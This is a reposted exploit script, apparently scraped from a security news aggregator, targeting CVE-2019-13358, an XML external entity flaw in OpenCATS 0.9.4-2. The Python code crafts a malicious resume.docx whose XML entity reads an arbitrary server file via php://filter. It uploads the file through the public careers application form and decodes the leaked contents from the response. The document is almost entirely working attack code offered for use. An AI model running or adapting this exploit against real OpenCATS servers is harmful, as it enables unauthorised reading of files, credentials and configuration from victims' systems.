OpenCats 0.9.4-2 XML Injection

# Exploit Title: OpenCats 0.9.4-2 – ‘docx ‘ XML External Entity Injection (XXE)
# Date: 2021-09-20
# Exploit Author: Jake Ruston
# Vendor Homepage: https://opencats.org
# Software Link: https://github.com/opencats/OpenCATS/releases/download/0.9.4-2/opencats-0.9.4-2-full.zip
# Version: < 0.9.4-3
# Tested on: Linux
# CVE: 2019-13358

from argparse import ArgumentParser
from docx import Document
from zipfile import ZipFile
from base64 import b64decode
import requests
import re

xml = “””
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?>
<!DOCTYPE root [<!ENTITY file SYSTEM ‘php://filter/convert.base64-encode/resource={}’>]>
<w:document xmlns:wpc=”http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas” xmlns:mo=”http://schemas.microsoft.com/office/mac/office/2008/main” xmlns:mc=”http://schemas.openxmlformats.org/markup-compatibility/2006″ xmlns:mv=”urn:schemas-microsoft-com:mac:vml” xmlns:o=”urn:schemas-microsoft-com:office:office” xmlns:r=”http://schemas.openxmlformats.org/officeDocument/2006/relationships” xmlns:m=”http://schemas.openxmlformats.org/officeDocument/2006/math” xmlns:v=”urn:schemas-microsoft-com:vml” xmlns:wp14=”http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing” xmlns:wp=”http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing” xmlns:w10=”urn:schemas-microsoft-com:office:word” xmlns:w=”http://schemas.openxmlformats.org/wordprocessingml/2006/main” xmlns:w14=”http://schemas.microsoft.com/office/word/2010/wordml” xmlns:wpg=”http://schemas.microsoft.com/office/word/2010/wordprocessingGroup” xmlns:wpi=”http://schemas.microsoft.com/office/word/2010/wordprocessingInk” xmlns:wne=”http://schemas.microsoft.com/office/word/2006/wordml” xmlns:wps=”http://schemas.microsoft.com/office/word/2010/wordprocessingShape” mc:Ignorable=”w14 wp14″>
<w:body>
<w:p>
<w:r>
<w:t>START&file;END</w:t>
</w:r>
</w:p>
<w:sectPr w:rsidR=”00FC693F” w:rsidRPr=”0006063C” w:rsidSect=”00034616″>
<w:pgSz w:w=”12240″ w:h=”15840″/>
<w:pgMar w:top=”1440″ w:right=”1800″ w:bottom=”1440″ w:left=”1800″ w:header=”720″ w:footer=”720″ w:gutter=”0″/>
<w:cols w:space=”720″/>
<w:docGrid w:linePitch=”360″/>
</w:sectPr>
</w:body>
</w:document>
“””

class CVE_2019_13358:
def __init__(self):
self.args = self.parse_arguments()

def parse_arguments(self):
parser = ArgumentParser()

required = parser.add_argument_group(“required arguments”)
required.add_argument(“–url”, help=”the URL where OpenCATS is hosted”, required=True)
required.add_argument(“–file”, help=”the remote file to read”, required=True)

args = parser.parse_args()

if not args.url.startswith(“http”):
args.url = f”http://{args.url}”

args.url = f”{args.url}/careers/index.php”

return args

def create_resume(self):
document = Document()
document.add_paragraph()
document.save(“resume.docx”)

def update_resume(self):
with ZipFile(“resume.docx”, “r”) as resume:
resume.extractall()

with open(“word/document.xml”, “w”) as document:
document.write(xml.format(self.args.file).strip())

with ZipFile(“resume.docx”, “w”) as resume:
resume.write(“word/document.xml”)

def get(self):
params = { “m”: “careers”, “p”: “showAll” }

try:
request = requests.get(self.args.url, params=params)
except:
raise Exception(“Failed to GET to the URL provided”)

id = re.search(r”ID=([0-9])*”, request.text)

if id is None:
raise Exception(“No vacancies were found”)

return id.group(1)

def post(self, id):
params = { “m”: “careers”, “p”: “onApplyToJobOrder” }
files = {
“ID”: (None, id),
“candidateID”: (None, -1),
“applyToJobSubAction”: (None, “resumeLoad”),
“file”: (None, “”),
“resumeFile”: open(“resume.docx”, “rb”),
“resumeContents”: (None, “”),
“firstName”: (None, “”),
“lastName”: (None, “”),
“email”: (None, “”),
“emailconfirm”: (None, “”),
“phoneHome”: (None, “”),
“phoneCell”: (None, “”),
“phone”: (None, “”),
“bestTimeToCall”: (None, “”),
“address”: (None, “”),
“city”: (None, “”),
“state”: (None, “”),
“zip”: (None, “”),
“keySkills”: (None, “”)
}

try:
request = requests.post(self.args.url, params=params, files=files)
except Exception as e:
raise Exception(“Failed to POST to the URL provided”, e)

start = request.text.find(“START”)
end = request.text.find(“END”)

file = request.text[start + 5:end].strip()

try:
file = b64decode(file)
file = file.decode(“ascii”).strip()
except:
raise Exception(“File not found”)

print(file)

def run(self):
self.create_resume()
self.update_resume()

id = self.get()
self.post(id)

CVE_2019_13358().run()

Singapore Cybersecurity Update Puts Cloud Providers on Notice

Octillo Launches Women's Cybersecurity Scholarship in Partnership With the Center for Cyber Safety a...

Microsoft: Russian SVR hacked at least 14 IT supply chain firms since May

Microsoft kills Cortana in Windows 11 preview, long live AI!

Data, Privacy, And the Future of Artificial Intelligence

OpenCats 0.9.4-2 XML Injection

Bybmalandrone

Related posts:

You missed

76ers’ Joel Embiid suspended 3 games following columnist altercation: report

San Jose State’s Brooke Slusser backs Trump’s trans athletes ban after alleged unfairness from school

America to decide the next president of the United States today

Ravens to acquire All-Pro cornerback Tre’Davious White in trade with Rams

Shackle Media